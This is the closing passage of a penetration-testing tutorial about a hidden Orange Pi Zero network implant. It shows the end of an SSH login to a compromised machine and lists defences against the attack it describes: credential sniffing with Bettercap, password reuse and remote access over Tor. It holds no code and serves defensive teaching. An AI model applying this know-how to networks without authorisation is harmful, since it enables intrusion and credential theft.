* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1
tokyoneon@ubuntu:~$
How to Protect Yourself Against Network Implant Attacks
- Enable HTTPS: The media server on the network didn't support HTTPS. This allowed the attacker to observe the login credentials using Bettercap. The use of HTTPS and other encrypted protocols will go a long way in thwarting an attackers ability to compromise the network further.
- Use Passwords Managers: The attacker in this example was able to reuse the media server password on the SSH server. The use of a password manager would've helped prevent the attacker from gaining access to the Ubuntu machine. It's always a bad idea to reuse passwords across multiple online accounts, servers, and operating systems.
- Disable DHCP: This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an IP address, Tor won't be able to connect to the internet. This would hinder the attackers able to access the network remotely. Disabling DHCP will only create an obstacle for the attacker, however. It wouldn't be impossible to enumerate the IP address and netmask for a static connection. Furthermore, if the attacker is still in the area, they would be able to use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually.
- Be Alert: Be mindful of the people and devices authenticated to the router you're connecting to. It also doesn't hurt to inspect devices physically attached to the router occasionally. This is especially important for router administrators operating in public areas like coffee shops, hospitals, and libraries. Public networks like these are prime targets for hackers looking to compromise as many people and services as possible.
Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements.
Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.
Cover photo by tokyoneon/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!